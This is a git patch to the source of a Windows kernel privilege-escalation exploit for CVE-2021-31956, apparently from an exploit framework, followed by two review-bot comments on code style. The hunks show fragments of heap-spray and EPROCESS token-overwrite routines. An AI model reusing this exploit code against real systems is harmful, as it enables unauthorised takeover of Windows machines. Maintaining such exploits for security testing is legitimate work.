From 3e6f3a15fa173d113da1139305eb5a034fb6c3a3 Mon Sep 17 00:00:00 2001 From: Tim W Date: Fri, 21 Jan 2022 09:23:47 +0000 Subject: [PATCH] 0x10000 /shrug --- .../source/exploits/CVE-2021-31956/CVE-2021-31956/dllmain.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/external/source/exploits/CVE-2021-31956/CVE-2021-31956/dllmain.c b/external/source/exploits/CVE-2021-31956/CVE-2021-31956/dllmain.c index a399a8c7c930..cbe6cfd348c4 100644 --- a/external/source/exploits/CVE-2021-31956/CVE-2021-31956/dllmain.c +++ b/external/source/exploits/CVE-2021-31956/CVE-2021-31956/dllmain.c @@ -402,6 +402,7 @@ int tiggerLeak() /*dprintf("got temp filename %s", lpTempFileName);*/ hFile = CreateFileA("C:\\Users\\User\\AppData\\Local\\Temp\\payload", + /*hFile = CreateFileA("payload",*/ GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, @@ -538,7 +539,6 @@ int HeapSpray() } - for (int i = 1; i < SPRAY_COUNT; i+=2) { @@ -757,8 +757,8 @@ NTSTATUS EnumProcessEprocess(PWNF_STATE_NAME StateName, PUCHAR Buff) UINT64 token = GetProcessToken(*(PULONGLONG)&(NameIns->StateName)); - UCHAR tokenBuff[0x6000] = { 0 }; - ULONG tokenBufferSize = 0x6000; + UCHAR tokenBuff[0x10000] = { 0 }; + ULONG tokenBufferSize = 0x10000; NameIns->StateData = (struct _WNF_STATE_DATA*)(eProcess + TOKEN_OFFSET); state = OverStateData(StateName, Buff);
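Review bot: In `tiggerLeak`, the added line `/*hFile = CreateFileA("payload",*/` is commented-out code, not a change in behaviour, and it sits next to an already commented-out `dprintf` just above it. Alternatives parked in comments leave the reader guessing which form is intended and why. I would drop the line, or replace it with a one-line comment stating why the absolute path is the form in use. The `CreateFileA` call runs past the end of the hunk, so the remaining arguments and any check of the returned handle are not visible here.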
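Review bot: In `EnumProcessEprocess`, the new size `0x10000` is written twice, once as the array bound and once as `tokenBufferSize`, so the two can drift apart the next time the number is changed; `ULONG tokenBufferSize = sizeof(tokenBuff);` keeps them tied together. The array is now 64 KiB of zero-initialised stack in a single frame, and neither the hunk nor the commit subject says why 0x6000 was too small, so a short comment naming what bounds the data written into `tokenBuff` would help the next reader. The function body starts and ends outside the hunk, so whether the length that comes back is compared against `tokenBufferSize` before the buffer is used cannot be confirmed from here.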